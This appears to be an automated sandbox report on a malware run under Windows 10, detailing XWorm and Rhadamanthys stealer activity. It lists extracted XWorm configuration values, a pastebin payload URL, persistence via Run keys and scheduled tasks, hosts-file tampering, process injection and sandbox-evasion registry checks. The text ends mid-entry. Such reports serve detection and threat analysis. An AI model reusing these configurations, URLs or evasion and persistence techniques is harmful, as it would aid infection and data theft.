Analysis
-
max time kernel
666s -
max time network
669s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
16/07/2023, 21:46
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com
Resource
win10v2004-20230703-en
General
-
Target
https://github.com
Malware Config
Extracted
https://pastebin.com/raw/zaCgrR02
Extracted
xworm
127.0.0.1:7000
ekJu4BRO6KRPlNHF
-
install_file
USB.exe
Signatures
-
Detect rhadamanthys stealer shellcode 2 IoCs
resource yara_rule behavioral1/memory/3484-1965-0x0000000002270000-0x0000000002670000-memory.dmp family_rhadamanthys behavioral1/memory/3484-1967-0x0000000002270000-0x0000000002670000-memory.dmp family_rhadamanthys -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description pid Process procid_target PID 440 created 4136 440 nefeczio.0j41.exe 178 PID 440 created 4136 440 nefeczio.0j41.exe 178 PID 440 created 4136 440 nefeczio.0j41.exe 178 PID 440 created 4136 440 nefeczio.0j41.exe 178 PID 440 created 4136 440 nefeczio.0j41.exe 178 PID 3484 created 4136 3484 nefeczio.0j42.exe 178 -
Blocklisted process makes network request 2 IoCs
flow pid Process 236 2452 powershell.exe 238 2452 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts nefeczio.0j41.exe -
Modifies Installed Components in the registry 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation win-xworm-builder.exe Key value queried \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation wsappx.exe Key value queried \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation XWorm.exe Key value queried \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation AtlsWare.exe -
Executes dropped EXE 11 IoCs
pid Process 1668 win-xworm-builder.exe 4928 builder.exe 2576 wsappx.exe 1556 builder.exe 3596 XWorm.exe 1172 XWorm V3.1.exe 4868 AtlsWare.exe 1096 nefeczio.0j40.exe 440 nefeczio.0j41.exe 3484 nefeczio.0j42.exe 3512 nefeczio.0j43.exe -
Loads dropped DLL 1 IoCs
pid Process 1512 XHVNC.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/memory/1512-935-0x0000000005F50000-0x0000000006174000-memory.dmp agile_net -
Uses the VBS compiler for execution 1 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Windows\CurrentVersion\Run chrome.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Windows\CurrentVersion\Run nefeczio.0j40.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" " nefeczio.0j40.exe -
Enumerates connected drives 3 TTPs 5 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: XWorm.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 136 ip-api.com -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 440 set thread context of 2544 440 nefeczio.0j41.exe 243 -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1972 sc.exe 3880 sc.exe 640 sc.exe 3704 sc.exe 2520 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 15 IoCs
pid pid_target Process procid_target 4560 3724 WerFault.exe 125 3388 2576 WerFault.exe 140 3408 2920 WerFault.exe 165 2656 3848 WerFault.exe 169 4732 2100 WerFault.exe 187 3488 3596 WerFault.exe 190 404 772 WerFault.exe 193 1816 3568 WerFault.exe 196 2024 2868 WerFault.exe 199 1604 632 WerFault.exe 3 4872 688 WerFault.exe 1 4604 2736 WerFault.exe 68 2756 3576 WerFault.exe 61 1976 5020 WerFault.exe 45 2584 3048 WerFault.exe 222 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 builder.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz builder.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2388 schtasks.exe 1108 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3412 timeout.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 4160 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 1 IoCs
pid Process 4192 taskkill.exe -
Modifies Control Panel 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\Colors rundll32.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\IESettingSync explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\GPU rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\GPU rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133340175960555971" chrome.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "7" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\MuiCache SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).x = "4294967295" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).bottom = "694" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\MuiCache SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search SearchApp.exe Set value (data) 